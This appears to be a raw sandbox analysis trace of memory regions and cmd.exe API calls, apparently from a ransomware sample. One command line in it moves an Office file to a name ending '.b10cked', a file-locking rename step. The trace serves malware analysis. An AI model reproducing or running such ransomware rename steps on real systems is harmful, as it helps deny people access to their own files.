Region: id = 21623 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21624 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21635 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21636 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21637 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21638 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 21639 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21640 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21641 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21642 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21643 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21644 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21645 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21646 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21647 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21648 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21649 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 21650 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21651 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21652 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 21653 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 21654 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 21655 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 21656 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 21657 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 21658 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001150000" filename = "" Thread: id = 324 os_tid = 0xe44 [0157.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbcc | out: lpSystemTimeAsFileTime=0x16fbcc*(dwLowDateTime=0x978cc9c0, dwHighDateTime=0x1d440a9)) [0157.069] GetCurrentProcessId () returned 0xd3c [0157.069] GetCurrentThreadId () returned 0xe44 [0157.069] GetTickCount () returned 0x30270 [0157.069] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbc4 | out: lpPerformanceCount=0x16fbc4*=21385797437) returned 1 [0157.070] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.070] __set_app_type (_Type=0x1) [0157.070] __p__fmode () returned 0x76b331f4 [0157.070] __p__commode () returned 0x76b331fc [0157.070] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.070] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.070] GetCurrentThreadId () returned 0xe44 [0157.070] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x38 [0157.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.070] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.070] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.070] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb5c | out: phkResult=0x16fb5c*=0x0) returned 0x2 [0157.071] VirtualQuery (in: lpAddress=0x16fb93, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: 
lpAddress=0x70000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0157.071] GetConsoleOutputCP () returned 0x1b5 [0157.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.071] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.072] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.072] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.072] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.072] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.072] GetEnvironmentStringsW () returned 0x280218* [0157.072] FreeEnvironmentStringsW 
(penv=0x280218) returned 1 [0157.072] GetEnvironmentStringsW () returned 0x280218* [0157.072] FreeEnvironmentStringsW (penv=0x280218) returned 1 [0157.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eacc | out: phkResult=0x16eacc*=0x40) returned 0x0 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0xa8, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x0, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x40, 
lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegCloseKey (hKey=0x40) returned 0x0 [0157.073] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eacc | out: phkResult=0x16eacc*=0x40) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x0, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegCloseKey (hKey=0x40) 
returned 0x0 [0157.073] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0157.073] srand (_Seed=0x5b88637f) [0157.073] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" [0157.073] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" [0157.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.074] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.074] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.074] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.074] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.074] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.074] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.074] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.074] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.074] GetEnvironmentStringsW () returned 0x282368* [0157.074] FreeEnvironmentStringsW (penv=0x282368) returned 1 [0157.074] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.074] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.074] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.074] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.074] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.075] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.075] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.075] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f898 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.075] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f898, lpFilePart=0x16f894 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f894*="Desktop") returned 0x18 [0157.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: 
hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.076] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.076] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.076] GetEnvironmentStringsW () returned 0x280218* [0157.076] FreeEnvironmentStringsW (penv=0x280218) returned 1 [0157.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.076] GetConsoleOutputCP () returned 0x1b5 [0157.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.076] GetUserDefaultLCID () returned 0x409 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="0") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="0") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="1") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.077] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.078] GetConsoleTitleW (in: lpConsoleTitle=0x270938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.123] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.124] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.124] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.124] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.124] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.124] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.124] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.124] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.128] GetConsoleTitleW (in: lpConsoleTitle=0x16f6d0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.128] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.128] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.128] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.128] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.128] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.128] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.128] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.129] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.129] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.129] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.129] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.129] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.129] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.129] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.129] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.129] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0157.129] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.129] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.129] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.129] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.131] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f48c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f484, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f484*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 